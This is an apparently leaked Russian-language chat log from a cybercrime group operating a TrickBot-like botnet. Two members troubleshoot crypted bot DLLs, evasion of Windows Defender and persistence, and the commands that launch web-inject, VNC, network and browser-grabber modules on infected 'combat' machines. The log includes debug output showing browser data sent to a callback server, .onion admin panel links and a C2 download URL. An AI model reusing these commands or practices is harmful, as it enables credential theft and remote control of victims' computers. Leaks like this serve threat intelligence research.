[26.07.21 07:53:58] angelo:		Аве Цезарь !
[26.07.21 07:54:10] angelo:		думал у Адама спросить, но лучше у тебя пока ))
[26.07.21 07:54:21] angelo:		мне тут клиент один сказал Зевс что у них боты мрут
[26.07.21 07:54:38] angelo:		не в кусре ?
[26.07.21 07:55:19] cesar:		привет
[26.07.21 07:55:30] cesar:		сейчас будем разбираться
[26.07.21 07:55:47] angelo:		у него проблемы то уже не первую неделю
[26.07.21 07:56:02] angelo:		долго не живут
[27.07.21 14:22:34] angelo:		Аве бро !
[27.07.21 14:22:43] angelo:		не узнавал что с ботами у Зевса ?
[27.07.21 14:22:58] angelo:		мож чем помочь ?
[27.07.21 14:42:01] cesar:		в каком смысле? что у него за проблемы?
[27.07.21 14:42:32] angelo:		боты умирают
[27.07.21 14:42:36] angelo:		быстро
[28.07.21 17:02:37] angelo:		привет
[28.07.21 17:02:48] angelo:		а какая команда на запуск с логами инжекта
[28.07.21 17:02:58] angelo:		61 tinjectDll start
[28.07.21 17:03:43] cesar:		да
[28.07.21 17:03:46] cesar:		привет
[28.07.21 17:04:09] angelo:		https://cceqv5ulg6fc44budf3a4s5kkrhprk5okjmdtgmo6xevj2p2sxnkh3id.onion/log/14625795
[28.07.21 17:04:17] angelo:		можешь посмотреть запусился или нет
[28.07.21 17:04:20] angelo:		чет не понял
[28.07.21 17:04:29] cesar:		сек
[28.07.21 17:05:13] cesar:		это обычный бот, не твой тестовый
[28.07.21 17:05:24] angelo:		ага
[28.07.21 17:05:25] cesar:		так что 62 tinjectDll start
[28.07.21 17:05:26] angelo:		знааю
[28.07.21 17:05:33] angelo:		у Дилона снова что-то не так
[28.07.21 17:05:51] cesar:		)(
[03.08.21 08:28:57] angelo:		привет
[03.08.21 08:29:09] angelo:		слушай, снова у меня такая штука после перегрузки машины с ботом
[03.08.21 08:29:24] angelo:		типа пишет что не может найти модуль
[03.08.21 08:30:03] angelo:		то есть получается после перегрузки боты мрут ?!
[03.08.21 08:30:11] cesar:		привет
[03.08.21 08:30:16] cesar:		а какой бот?
[03.08.21 08:30:28] angelo:		это был трик
[03.08.21 08:30:30] angelo:		МОД
[03.08.21 08:30:31] cesar:		какой запускал?
[03.08.21 08:30:39] angelo:		эм
[03.08.21 08:30:43] cesar:		mod8 ?
[03.08.21 08:30:50] angelo:		mod8_dfHarxhruR.dll
[03.08.21 08:30:55] angelo:		криптованный
[03.08.21 08:31:22] cesar:		так, и после перезагрузки какой было сообщение?
[03.08.21 08:31:27] cesar:		какое
[03.08.21 08:31:40] angelo:		сек
[03.08.21 08:32:17] angelo:		There was a problem starting. The specified module could not be found
[03.08.21 08:32:22] angelo:		и там путь
[03.08.21 08:32:39] cesar:		а как долго бот работал?
[03.08.21 08:32:42] angelo:		к файоу с расширением grf
[03.08.21 08:32:44] cesar:		до этого
[03.08.21 08:32:50] angelo:		час точно
[03.08.21 08:33:03] angelo:		это уже не единожды повторяется
[03.08.21 08:33:04] cesar:		значит дефендер его снес
[03.08.21 08:33:13] angelo:		да вот нет
[03.08.21 08:33:18] angelo:		ща посмотрю историю
[03.08.21 08:34:18] angelo:		нет
[03.08.21 08:34:28] angelo:		История чистая
[03.08.21 08:34:50] cesar:		и бот отстучал успешно?
[03.08.21 08:35:03] angelo:		думаю что нет
[03.08.21 08:35:06] angelo:		сейчас посмотрю
[03.08.21 08:36:13] angelo:		нет
[03.08.21 08:36:15] angelo:		не стучит
[03.08.21 08:36:35] angelo:		то есть бот по сути помирает без детекта после перегрузки
[03.08.21 08:37:07] cesar:		ок, посмотрю. А мод8 от какого числа?
[03.08.21 08:37:14] cesar:		вчерашний?
[03.08.21 08:37:16] angelo:		вчерашний
[03.08.21 08:37:18] angelo:		ага
[03.08.21 08:37:24] cesar:		ок, проверю
[03.08.21 08:37:26] cesar:		спс
[03.08.21 08:37:30] angelo:		спасибо!
[03.08.21 08:53:18] cesar:		да, есть косяк, если бот не смог подключится, то на длл версии не прописывается
[03.08.21 08:53:26] cesar:		исправлю, спасибо
[03.08.21 08:53:46] angelo:		отлично, тебе спасибо !
[03.08.21 10:04:47] angelo:		а скажи, то что после запуска бота, Винда блокируется точно норм ?
[03.08.21 10:25:24] cesar:		что именно блокируется?
[03.08.21 10:25:37] angelo:		винда
[03.08.21 10:25:44] angelo:		знаешь как буд-то выходишь из системы
[03.08.21 10:25:51] angelo:		у меня такое очень часто бывает
[03.08.21 10:25:53] angelo:		у ХАйми
[03.08.21 10:26:02] cesar:		это модуль так влияет
[03.08.21 10:26:08] angelo:		ну вот тож думал
[03.08.21 10:48:12] angelo:		слух, прости что всё о бане
[03.08.21 10:48:20] angelo:		а как там с очищением трика ?
[03.08.21 10:48:47] angelo:		я так и не понял, че там боты то мрут у Зевса
[03.08.21 10:49:07] angelo:		я ж запускаю криптованные и норм, тишина или их не Деф жрет ?
[03.08.21 10:50:09] cesar:		занимаемся этим вопросом
[03.08.21 10:50:24] cesar:		скорее всего именно деф жрет, но не сразу
[03.08.21 10:50:56] angelo:		понял, сорян что спрашиваю не раз уже
[04.08.21 14:55:36] angelo:		привет
[04.08.21 14:55:45] angelo:		даш свежий бот
[04.08.21 14:55:49] angelo:		тестовый какой нибудь
[04.08.21 15:45:33] angelo:		какой командой ВНЦ модуль запускается ?
[04.08.21 15:56:32] cesar:		привет, скоро закину
[04.08.21 15:56:41] cesar:		тебе же с 61 командой?
[04.08.21 15:56:50] cesar:		чтобы другие не запускались?
[04.08.21 15:57:17] angelo:		да любой наверно
[04.08.21 15:57:20] angelo:		не принципиально
[04.08.21 15:57:24] angelo:		можно и его
[04.08.21 15:58:09] cesar:		тогда с криптопанели бери на третью админку
[04.08.21 15:58:15] cesar:		там уже криптованные
[04.08.21 15:58:32] cesar:		rob120
[04.08.21 15:58:35] cesar:		mod8
[04.08.21 15:58:44] cesar:		любой из этих
[04.08.21 16:00:05] angelo:		ок
[04.08.21 16:00:22] angelo:		ты знаком с ВНЦ ?
[04.08.21 16:00:33] angelo:		нужно в черной панели запускать модуль ?
[04.08.21 16:02:40] cesar:		да
[04.08.21 16:02:51] cesar:		только уточни какой внц
[04.08.21 16:03:09] angelo:		мля
[04.08.21 16:03:12] angelo:		а их много ?!
[04.08.21 16:04:05] cesar:		наш называется vncDll
[04.08.21 16:04:26] cesar:		а еще сторонний хотели подключить
[04.08.21 16:04:36] cesar:		может про него речь идет
[04.08.21 16:04:53] angelo:		ну вот хоть кто-то мне что-то сказал
[04.08.21 16:04:57] angelo:		спасибо - ща узнаю
[04.08.21 16:06:50] angelo:		наш
[04.08.21 16:06:55] angelo:		vncDll
[04.08.21 16:07:33] cesar:		значит как обычно 62 vncDll start
[04.08.21 16:37:15] angelo:		а на тст61 тоже так же запускать ?
[04.08.21 16:37:19] angelo:		62 vncDll start
[04.08.21 16:38:42] angelo:		то есть чтобы через вьювер посмотреть нужно сначала запустить внц команду, правильно ?
[04.08.21 16:52:53] angelo:		нуна помощь бро
[04.08.21 16:52:58] angelo:		на минутку
[04.08.21 16:53:05] angelo:		не понял, запустился ВНЦ или нет
[04.08.21 17:01:03] cesar:		сек, поищу контакт
[04.08.21 17:01:13] angelo:		61
[04.08.21 17:01:16] cesar:		автора внц
[04.08.21 17:01:16] angelo:		загрузился
[04.08.21 17:01:20] angelo:		нее
[04.08.21 17:01:25] angelo:		норм, пуск получился
[04.08.21 17:01:44] cesar:		он же должен в внц админку отстучать
[04.08.21 17:01:54] cesar:		можно запустить сам клиент
[04.08.21 17:02:05] cesar:		проверить как он работает
[04.08.21 17:02:13] angelo:		всё норм
[04.08.21 17:02:16] angelo:		сделал пуск внц
[04.08.21 17:02:23] angelo:		и ботанашел в розовой админке
[04.08.21 17:02:30] angelo:		сейчас смотрю вьювер
[04.08.21 17:03:52] cesar:		а, ок
[05.08.21 10:13:18] angelo:		привет
[05.08.21 10:13:21] angelo:		!!!
[05.08.21 10:13:27] angelo:		зальешь новый инж ?
[05.08.21 10:13:40] cesar:		привет, да
[05.08.21 10:19:18] angelo:		https://send.exploit.in/download/60e68773f33d7cb9/#jaKHbTdWgbf0a5C4CFxdkg
[05.08.21 10:19:28] angelo:		b52087ba2c17378794fa8c6257ccc746
[05.08.21 10:19:47] cesar:		ок
[05.08.21 10:20:36] angelo:		вроде Хейми её уже заливал, но на всякий случай перезальем
[05.08.21 10:25:25] cesar:		залито
[05.08.21 10:25:32] angelo:		ок спасибо
[05.08.21 10:25:44] angelo:		тебе Мануэль писал ?
[05.08.21 10:25:45] cesar:		tinjectDll и injectDll, только 64 битные
[05.08.21 10:25:52] angelo:		он вчера тестил бк с триком
[05.08.21 10:26:01] angelo:		окай, ща проверю
[05.08.21 10:26:22] angelo:		погоди а tinjectDll тоже обновился ?
[05.08.21 10:26:32] angelo:		я думал я тебе скинул не логированный
[05.08.21 10:26:42] cesar:		да, там был и с логом
[05.08.21 10:26:48] angelo:		ааа
[05.08.21 10:26:56] angelo:		ща проверю на запуске
[05.08.21 10:27:24] angelo:		вот тебе от Мануэля
[05.08.21 10:27:25] angelo:		По итогу теста, в dll БК прогрузил dll трика. Бот трика появился в админке. Все сработало.
Тестировал на тестовом сервере нашей фермы.
После перезапуска, появилось окно:
https://prnt.sc/1j37gab
и детект трика Wacatac.B!ml
https://prnt.sc/1j432d0
Я так понимаю это детект трика на закреп.
БК работает после перезапуска ОС
бот: Bot ddfde222ad8e39e71a768615ed31d9b4
трик бот: 162.244.82.215 DESKTOP-K6MLDD7_W10019043.397CB3BCC695B01FB121797AB933B331
Походу надо что то делать с закрепом у трика
Просто все. Запустить в БК трика длл
и посмотреть результат
[05.08.21 10:30:20] cesar:		ок
[05.08.21 11:23:43] angelo:		я как всегда бро)
[05.08.21 11:23:50] angelo:		команда на запуск
[05.08.21 11:23:52] angelo:		62 ?
[05.08.21 11:23:55] angelo:		инжекта
[05.08.21 11:24:04] angelo:		я на боте mod8 сижу ща
[05.08.21 11:24:58] cesar:		да
[05.08.21 11:25:36] angelo:		ты не думай, не дурак, просто часто в голове каша
[05.08.21 11:26:27] cesar:		у меня тоже, даже не помню что на завтрак кушал
[05.08.21 11:26:35] cesar:		так что понимаю
[05.08.21 11:26:53] angelo:		спасибо ) стало легче
[05.08.21 11:27:05] cesar:		)))
[05.08.21 14:11:51] angelo:		прости !
[05.08.21 14:11:52] angelo:		)
[05.08.21 14:12:13] angelo:		напомни ещё раз команду на ВНЦ
[05.08.21 14:12:13] angelo:		62 WebiDll start
[05.08.21 14:12:14] angelo:		?
[05.08.21 14:14:54] angelo:		vncDll start
[05.08.21 14:14:54] angelo:		yfitk
[05.08.21 14:14:55] angelo:		нашел
[05.08.21 14:16:10] cesar:		ок
[10.08.21 12:32:46] angelo:		тута ?
[10.08.21 12:54:36] cesar:		привет
[10.08.21 12:54:44] angelo:		слухай
[10.08.21 12:54:56] angelo:		можешь дать бота тестового
[10.08.21 12:55:09] angelo:		на неё кинем тестовый конфиг для Инжекта
[10.08.21 12:57:32] cesar:		бери любой с криптопанели
[10.08.21 12:59:04] angelo:		а там тестовых нету
[10.08.21 12:59:12] angelo:		у меня тока 61 валялся
[10.08.21 12:59:18] angelo:		на него могу ?
[10.08.21 12:59:25] cesar:		залью сейчас tst31
[10.08.21 12:59:37] angelo:		окай
[10.08.21 12:59:38] cesar:		он старый наверное, конфиг протух уже
[10.08.21 13:01:30] cesar:		залито
[10.08.21 13:01:40] angelo:		спс
[10.08.21 13:01:47] angelo:		ща Деф зальёт конфиг
[11.08.21 11:50:29] angelo:		Аве Цезарь !
[11.08.21 11:50:41] angelo:		тут говорят надо импорт потрогать
[11.08.21 11:51:35] cesar:		привет
[11.08.21 11:51:41] cesar:		потрогай )
[11.08.21 11:51:48] angelo:		да вот чет забыл
[11.08.21 11:51:51] cesar:		importDll getdata
[11.08.21 11:51:56] cesar:		как обычно
[11.08.21 11:51:59] angelo:		а коим образом посмотреть что он передает ?
[11.08.21 11:51:59] cesar:		62
[11.08.21 11:52:10] angelo:		в паре с чем то
[11.08.21 11:52:21] cesar:		так, отчеты должны приходить в админку
[11.08.21 11:52:49] cesar:		можно протестировать через специальную программу, тогда отчеты будут сохраняться в файл
[11.08.21 11:53:01] cesar:		но у тебя же задача проверить через бот?
[11.08.21 11:53:03] angelo:		да поди лучше наверно напрямую
[11.08.21 11:53:07] angelo:		думаю да
[11.08.21 11:53:20] angelo:		я 31 тогда запущу
[11.08.21 11:53:24] angelo:		что вчера ты дал
[11.08.21 11:53:45] cesar:		ок, тогда даешь команду и ждешь, мин через 5 -10 после старта модуля должны придти события с названиями браузеров в черную админку
[11.08.21 11:53:58] angelo:		ок
[11.08.21 11:53:59] angelo:		спс
[11.08.21 11:54:02] angelo:		ща сделаю
[11.08.21 11:54:05] cesar:		будет что то непонятно - пиши
[11.08.21 11:54:11] cesar:		31 норм, да
[11.08.21 11:54:16] angelo:		поняль
[11.08.21 14:06:48] angelo:		а смотреть логи через розовую да панель ?
[11.08.21 14:07:18] cesar:		лучше через черную
[11.08.21 14:07:26] cesar:		в розовой я не бум бум
[11.08.21 14:07:27] angelo:		да не дает
[11.08.21 14:07:31] angelo:		в черной
[11.08.21 14:07:34] angelo:		показывает логи
[11.08.21 14:07:38] angelo:		и зеленные значки
[11.08.21 14:07:38] cesar:		может и там есть, но я без понятия
[11.08.21 14:07:47] angelo:		в черной можно скачать ?
[11.08.21 14:08:14] cesar:		вот не знаю, спроси у frank
[11.08.21 14:08:24] cesar:		он по розовой спец
[11.08.21 14:08:36] angelo:		DebugLog дает скачать
[11.08.21 14:08:38] angelo:		в черной
[11.08.21 14:08:39] cesar:		может там можно скать без проблем
[11.08.21 14:08:49] angelo:		а в черной как ты не в курсе ?
[11.08.21 14:16:34] cesar:		уточни у адама, он мне както говорил, какие то ip скидывал
[11.08.21 14:16:43] cesar:		но давно было
[11.08.21 14:16:46] angelo:		понял
[11.08.21 14:16:50] angelo:		я через розоую
[12.08.21 11:44:43] angelo:		бро
[12.08.21 11:44:56] angelo:		мне тут Адам сказал как качать логи в черной
[12.08.21 11:44:58] angelo:		но я не понял
[12.08.21 11:54:37] angelo:		понял
[12.08.21 11:55:57] cesar:		?
[12.08.21 11:56:00] cesar:		привет
[12.08.21 11:56:12] angelo:		всё норм )
[12.08.21 11:56:30] cesar:		)
[12.08.21 12:05:24] angelo:		ты можешь посмотреть дебаг одного бота ?
[12.08.21 12:05:32] angelo:		я импорт смотрел
[12.08.21 12:05:34] angelo:		конфигов нету
[12.08.21 13:26:11] cesar:		что значит нету?
[12.08.21 13:26:41] angelo:		Деф сказал если не качает то нету, надо посмотреть дебаглог
[12.08.21 13:26:44] angelo:		на этом боте
[12.08.21 13:26:55] angelo:		/log/15668045
[12.08.21 13:31:46] cesar:		скинь еще раз какой там бот
[12.08.21 13:31:56] cesar:		чат вылетел
[12.08.21 13:32:07] angelo:		не качаются логи из админки
[12.08.21 13:32:10] angelo:		не даёт их
[12.08.21 13:32:26] cesar:		еще раз
[12.08.21 13:32:30] cesar:		не дошло
[12.08.21 13:32:42] angelo:		не даёт скачать логи из админки
[12.08.21 13:32:48] angelo:		Адам сказал смотрите дебаглоги
[12.08.21 13:33:13] cesar:		ссылку на бот
[12.08.21 13:33:16] angelo:		я в них как свинья в апельсинах
[12.08.21 13:33:16] cesar:		повтори
[12.08.21 13:33:26] angelo:		https://cceqv5ulg6fc44budf3a4s5kkrhprk5okjmdtgmo6xevj2p2sxnkh3id.onion/log/15668045
[12.08.21 13:33:36] cesar:		ок
[12.08.21 13:33:51] angelo:		мож я мудак криворукий
[12.08.21 13:34:01] angelo:		не исключаю
[12.08.21 13:35:07] cesar:		***** Send 12098 bytes to callback from Edge *****
[12.08.21 13:35:25] cesar:		***** Send 22282 bytes to callback from Chrome *****
[12.08.21 13:35:45] cesar:		***** Send 21155 bytes to callback from Firefox *****
[12.08.21 13:36:09] cesar:		данные отправлены
[12.08.21 13:36:17] cesar:		как их скачать я не в курсе
[12.08.21 13:39:12] angelo:		так
[12.08.21 13:39:29] angelo:		бот из черной дублируется в розовую так ?
[12.08.21 13:40:03] angelo:		да там просто
[12.08.21 13:40:16] angelo:		код копируется
[12.08.21 13:40:21] angelo:		ссылкой
[12.08.21 13:40:29] angelo:		из кода страницы(элемента)
[12.08.21 13:40:39] angelo:		но у меня не получается - пишет оишбку
[12.08.21 13:40:52] angelo:		вот надо бы в розовой опробовать скачать
[12.08.21 13:42:34] angelo:		<a href="mailto:_https://45.61.138.86/edownload/fgytf33578jg8zp345yhbffyh/GetLastEventData?cid=95C1F095A3C1BEB725CBB33BBF1E15BB&amp;module=importDll&amp;event=Firefox" class="btn btn-xs btn-success" ng-class="d.data?'btn-success':'btn-danger'">
                <span class="glyphicon glyphicon-download-alt"></span>
            </a>
[12.08.21 13:42:43] angelo:		и вот отсюда береться ссылка и должен качать
[12.08.21 13:42:47] cesar:		я не в курсе, это к адаму наверное
[12.08.21 13:44:13] angelo:		бред, а теперь дал скачать
[12.08.21 13:47:01] angelo:		только Хрома нету
[12.08.21 13:47:01] angelo:		в админке
[12.08.21 13:48:57] cesar:		как нет?
[12.08.21 13:49:00] cesar:		2021-08-11 13:52:41 	importDll 	Chrome 	grabber 	grab_impl
[12.08.21 13:49:21] angelo:		хм
[12.08.21 13:49:25] angelo:		погодика
[12.08.21 13:50:51] angelo:		так
[12.08.21 13:50:58] angelo:		число 11
[12.08.21 13:51:33] angelo:		2021-08-11
[12.08.21 13:52:44] cesar:		там бот вчерашний
[12.08.21 13:53:06] angelo:		https://cceqv5ulg6fc44budf3a4s5kkrhprk5okjmdtgmo6xevj2p2sxnkh3id.onion/log/15756658
[12.08.21 13:53:12] angelo:		мля не тот кинул
[12.08.21 13:54:05] cesar:		скачай debuglog
[12.08.21 13:54:16] angelo:		скачал
[12.08.21 13:54:20] cesar:		в нем написано что модуль отправил
[12.08.21 13:54:25] cesar:		и какой размер
[12.08.21 13:54:47] cesar:		***** Send 5099 bytes to callback from InternetExplorer *****
[12.08.21 13:55:04] cesar:		***** Send 20158 bytes to callback from Edge *****
[12.08.21 13:55:15] cesar:		***** Send 22410 bytes to callback from Firefox *****
[12.08.21 13:55:22] cesar:		хрома почему то нет
[12.08.21 13:56:12] angelo:		а я вижу Send 22282 bytes to callback from Chrome
[12.08.21 13:56:24] cesar:		похпже хром был запущен на этой машине
[12.08.21 13:56:30] angelo:		хм
[12.08.21 13:56:37] angelo:		надо переделать мне
[12.08.21 13:56:45] cesar:		и модуль не смог его закрыть и открыть новый
[12.08.21 13:57:03] angelo:		понял тебя
[12.08.21 17:38:27] angelo:		как узнать прогрузился конфиг или нет ?
[12.08.21 17:38:29] angelo:		траблы у Зевса
[12.08.21 17:41:43] angelo:		https://dnog7cgicmkrvugrfxexo34gikjbr54sd5skxj4r42aj4tuy2hjsw6qd.onion/logpost/more_ex/2BBF4D5F767B3C58F3356A97F9BBA3F9
[12.08.21 17:45:38] cesar:		конфиг чего?
[12.08.21 17:49:08] angelo:		зевса
[12.08.21 17:49:11] angelo:		для инжекта
[12.08.21 17:49:39] angelo:		ну помнишь кидаем для залива для ИнжеклДЛЛ
[12.08.21 17:49:55] angelo:		вот можно узнать загружался конфиг или нет
[12.08.21 17:49:59] angelo:		по этому боту
[12.08.21 17:50:18] cesar:		сейчас в черной посмотрю
[12.08.21 17:58:14] cesar:		да, модуль запускался давно
[12.08.21 17:58:24] cesar:		а winj обновился час назад
[12.08.21 17:58:43] cesar:		там только с модулем pwgrabb какие то проблемы
[12.08.21 17:58:54] cesar:		перезапускается постоянно
[12.08.21 17:59:06] angelo:		бля
[12.08.21 17:59:08] cesar:		это тестовый бот?
[12.08.21 17:59:10] angelo:		кругом проблемы
[12.08.21 17:59:12] angelo:		нет
[12.08.21 17:59:13] angelo:		боевой
[12.08.21 17:59:27] cesar:		хреново
[12.08.21 17:59:54] angelo:		успеешь ещё посомтреть ?
[12.08.21 18:00:09] angelo:		может и на других всё так же
[12.08.21 18:01:30] angelo:		DESKTOP-RNSI80R_W10019041.2A7B31C73738B3369BD9BC8F337FEB7A
[12.08.21 18:01:36] cesar:		а почему про конфиг спрашивали?
[12.08.21 18:02:01] angelo:		прогер конфига смотрел код страниц и не увидел код инжекта
[12.08.21 18:02:11] angelo:		то есть конфиг не отработал
[12.08.21 18:02:28] angelo:		LAPTOP-LR24DEHJ_W10019042.33128FFE82FB3EC5BBF1EBB6193B73F7
[12.08.21 18:02:29] angelo:		и вот
[12.08.21 18:02:43] angelo:		на этих посомтри плиз, мож чё увидим узнаем
[12.08.21 18:03:40] cesar:		2021-08-12 17:45:18.843293 	vncconf2 5
[12.08.21 18:03:57] cesar:		15 минут назад обновился на DESKTOP-RNSI80R_W10019041.2A7B31C73738B3369BD9BC8F337FEB7A
[12.08.21 18:04:07] cesar:		и до этого обновлялся, тут все норм
[12.08.21 18:04:27] angelo:		ну как минимцм видим что нету проблем с грабером модулем
[12.08.21 18:04:37] angelo:		лан, ща с Хайми решать будем
[12.08.21 18:04:53] angelo:		будем логированный запускать и смотреть
[12.08.21 18:05:00] angelo:		отошел на 10 мин*
[13.08.21 10:35:51] angelo:		привет бро
[13.08.21 10:36:03] angelo:		я новый внц могу запустить на тестовом 31 боте ?
[13.08.21 10:38:56] cesar:		привет
[13.08.21 10:38:58] cesar:		да
[13.08.21 10:39:09] cesar:		62 vnc2Dll start
[13.08.21 10:41:19] angelo:		угу
[13.08.21 10:41:25] angelo:		сенкью вери мач
[13.08.21 11:04:22] angelo:		а ты по розовой админке не знаешь ?
[13.08.21 11:04:27] angelo:		чет нажимаю кнопку и тишина
[13.08.21 11:05:26] cesar:		кнопку чего?
[13.08.21 11:05:27] angelo:		я про внц
[13.08.21 11:05:31] angelo:		внц 2
[13.08.21 11:05:47] cesar:		в черной админке посмотри этот бот
[13.08.21 11:06:02] cesar:		там же кнопка просто дает задание на загрузку модуля
[13.08.21 11:06:21] angelo:		аааа
[13.08.21 11:06:35] cesar:		а чтобы подключиться нужно искать на определенном сайте этого бота и т.д.
[13.08.21 11:06:49] angelo:		блин
[13.08.21 11:06:52] angelo:		как всё сложно то
[13.08.21 11:07:19] cesar:		пиши наверное адаму, модуль новый - никто кроме него не умеет
[13.08.21 11:07:20] angelo:		нам нужно зайти на комп по внц
[13.08.21 11:07:27] angelo:		опять адам (
[13.08.21 11:07:50] cesar:		ну или спроси у него к кому обратиться
[13.08.21 17:14:03] angelo:		как запустить нетворк модуль
[13.08.21 17:14:03] angelo:		как там писать его
[13.08.21 17:14:08] angelo:		чтоб бот попал в розовую админку
[13.08.21 17:15:02] cesar:		networkDll start
[13.08.21 17:15:08] angelo:		спс
[17.08.21 12:32:00] angelo:		привет
[17.08.21 12:32:11] cesar:		привет
[17.08.21 12:32:21] angelo:		да хотел спросить
[17.08.21 12:32:25] angelo:		я не ту команду ввел
[17.08.21 12:33:18] angelo:		tinjectlogDll
[17.08.21 12:33:19] angelo:		62 tinjectDll start
[17.08.21 12:33:19] angelo:		вместо
[17.08.21 12:34:00] angelo:		всё? пипец ?)
[17.08.21 12:34:13] cesar:		в каком смысле?
[17.08.21 12:34:21] angelo:		ну это старая сборка ?
[17.08.21 12:34:25] angelo:		или сегодняшняя будет ?
[17.08.21 12:34:37] cesar:		сегодняшняя
[17.08.21 12:34:43] cesar:		заливал час назад
[17.08.21 12:40:01] angelo:		окай
[17.08.21 13:14:51] angelo:		скажи а если мы залили новый модуль, то по факту все рабочие боты тоже получили новую сборку ?
[17.08.21 13:14:55] angelo:		туплю как всегда
[17.08.21 13:15:54] cesar:		залили как тестовый
[17.08.21 13:16:02] angelo:		ааа
[17.08.21 13:16:09] cesar:		всем идет inportFll
[17.08.21 13:16:13] cesar:		importDll
[17.08.21 13:16:21] cesar:		injectDll
[17.08.21 13:16:24] cesar:		вернее
[17.08.21 13:16:30] angelo:		понял
[17.08.21 14:48:23] angelo:		новая сборка ушла на другие группы ?
[17.08.21 14:48:45] cesar:		да
[17.08.21 16:56:38] angelo:		а вот вопрос
[17.08.21 16:56:43] angelo:		сейчас Зевс смотрит бота
[17.08.21 16:56:51] angelo:		у которого уже был прогруз инжекта
[17.08.21 16:57:16] angelo:		получается новые(сегодняшние) изменения не вступят в силу ?
[17.08.21 16:57:18] angelo:		чет не понимаю
[17.08.21 16:57:41] cesar:		нужно на всех ботах дать команду injectDll start
[17.08.21 16:57:47] cesar:		из админки
[17.08.21 16:57:54] cesar:		для обновления модулей
[17.08.21 16:58:04] cesar:		это адам делает
[17.08.21 16:58:14] angelo:		свитни ему а
[17.08.21 16:58:15] angelo:		плиз
[17.08.21 16:58:19] cesar:		ок
[17.08.21 17:02:20] cesar:		написал, пока как рыба об лед
[18.08.21 09:05:07] angelo:		привет
[18.08.21 09:05:34] angelo:		наш общительный человек залил новый инжект не ?
[18.08.21 09:06:37] cesar:		привет
[18.08.21 09:07:17] cesar:		вчера заливали новый модуль
[18.08.21 09:07:28] cesar:		сегодня нет
[18.08.21 09:08:35] cesar:		и заливали только версию 64 бита
[18.08.21 09:10:05] angelo:		не, ты Адама прсоил кинуть новую сборку на все боты
[18.08.21 09:10:06] angelo:		он сделал ?
[18.08.21 09:10:56] cesar:		написал, что сделает
[18.08.21 09:14:31] angelo:		окай
[18.08.21 09:14:31] angelo:		ждем
[18.08.21 09:14:34] angelo:		отпишу ему тоже
[18.08.21 11:05:13] angelo:		а никак не посмотреть да, новая сборка или нет на ботах зевса ?
[18.08.21 11:48:32] cesar:		модуль при старте может посылать данные о версии в админку
[18.08.21 11:48:46] cesar:		не помню, делает ли это инжект
[18.08.21 11:58:00] angelo:		у ХАйме машина со вчера стоит, загрузили и как буд-то другой модуль подгрузился
[18.08.21 11:58:03] angelo:		вот дела
[18.08.21 12:14:55] angelo:		прости
[18.08.21 12:15:05] angelo:		а сейчас какой командой запускать инжект ?
[18.08.21 12:15:09] angelo:		чтоб был новый
[18.08.21 12:15:12] angelo:		новая сборка
[18.08.21 12:15:14] angelo:		вчерашняя
[18.08.21 12:15:41] cesar:		injectDll start
[18.08.21 12:16:38] angelo:		а с логами ?
[18.08.21 12:20:07] angelo:		лан пока так запущу
[18.08.21 12:23:44] angelo:		смотри
[18.08.21 12:23:49] angelo:		запускаю injectDll start
[18.08.21 12:23:53] angelo:		смотрю в боте
[18.08.21 12:24:04] angelo:		tinjectDll 	2021-08-17 12:27:01.6776 	start 	Success
[18.08.21 12:24:04] angelo:		это норм ?
[18.08.21 12:25:35] cesar:		а что нужно?
[18.08.21 12:25:48] angelo:		ну думал будет писать иначе
[18.08.21 12:25:55] angelo:		вот так injectDll
[18.08.21 12:26:11] angelo:		или это не принципиально ?
[18.08.21 12:26:13] cesar:		а как запускал?
[18.08.21 12:26:21] angelo:		injectDll start
[18.08.21 12:26:26] angelo:		62
[18.08.21 12:26:30] cesar:		скинь линк на бота
[18.08.21 12:26:37] angelo:		https://cceqv5ulg6fc44budf3a4s5kkrhprk5okjmdtgmo6xevj2p2sxnkh3id.onion/log/15889932
[18.08.21 12:29:20] cesar:		2021-08-18 12:24:25 	injectDll 	VERS 	browser 	Build date: Aug 17 2021 12:05:08
[18.08.21 12:29:34] cesar:		что не так?
[18.08.21 12:30:28] angelo:		всё так
[18.08.21 12:30:30] angelo:		прости меня
[18.08.21 12:30:36] angelo:		знаю умею заебать на ровном месте
[18.08.21 12:31:22] cesar:		)
[18.08.21 12:47:32] angelo:		скажи а я могу модуль скачать с админки ?
[18.08.21 12:48:42] cesar:		нет
[18.08.21 12:48:48] angelo:		уже понял
[18.08.21 12:48:50] cesar:		тебе нужен модуль?
[18.08.21 12:48:51] angelo:		0 Кб даёт
[18.08.21 12:48:55] angelo:		да не
[18.08.21 12:48:57] angelo:		это так
[18.08.21 12:49:03] angelo:		инжекты не срабатывают
[18.08.21 12:49:07] angelo:		вчера всё раотало
[18.08.21 12:49:14] angelo:		ну что за п*ц !
[18.08.21 12:49:46] angelo:		как запустить с логами новую сборку ?!
[18.08.21 12:49:49] angelo:		команда
[18.08.21 12:50:51] cesar:		tinjectDll start
[18.08.21 12:51:07] angelo:		ок
[18.08.21 14:14:59] angelo:		чет логов нету
[18.08.21 14:15:05] angelo:		точно так команда ?
[18.08.21 14:16:45] angelo:		мы не могли перепутать модули на команды ?
[18.08.21 14:18:31] cesar:		проверю
[18.08.21 14:19:33] cesar:		нет, все верно
[18.08.21 14:20:04] cesar:		по логу пиши jaime
[19.08.21 10:19:48] angelo:		Аве брат !
[19.08.21 10:20:02] angelo:		надо последний инжект перекинуть на ботов
[19.08.21 10:20:15] angelo:		чтоб радотали как негры
[19.08.21 10:20:36] cesar:		привет
[19.08.21 10:20:43] cesar:		ок, закину через 10 мин
[19.08.21 10:20:49] angelo:		окаюшки бро
[19.08.21 10:24:11] cesar:		негры залиты
[19.08.21 10:24:16] cesar:		но только 64битные
[19.08.21 10:24:26] angelo:		а ты на куда их залил
[19.08.21 10:24:29] cesar:		32 битные обновы не было
[19.08.21 10:24:29] angelo:		для точности понимания
[19.08.21 10:24:31] angelo:		на какие
[19.08.21 10:24:35] angelo:		понял
[19.08.21 10:24:43] cesar:		injectDll
[19.08.21 10:24:53] angelo:		так, а на какие группы они пойдут ?
[19.08.21 10:25:00] angelo:		он
[19.08.21 10:25:01] cesar:		на все
[19.08.21 10:25:05] angelo:		ок
[19.08.21 10:25:08] cesar:		на обе админки
[19.08.21 10:25:13] angelo:		ок брат
[19.08.21 10:25:15] angelo:		принял
[19.08.21 10:25:34] angelo:		а чтобы они обновились на ботах - нужен Адам ?)
[19.08.21 10:26:34] cesar:		вообще чтобы всем обновить - да
[19.08.21 10:26:47] cesar:		на конкретном боте можно обновить самому
[19.08.21 10:27:08] angelo:		угу
[19.08.21 10:27:09] angelo:		спс
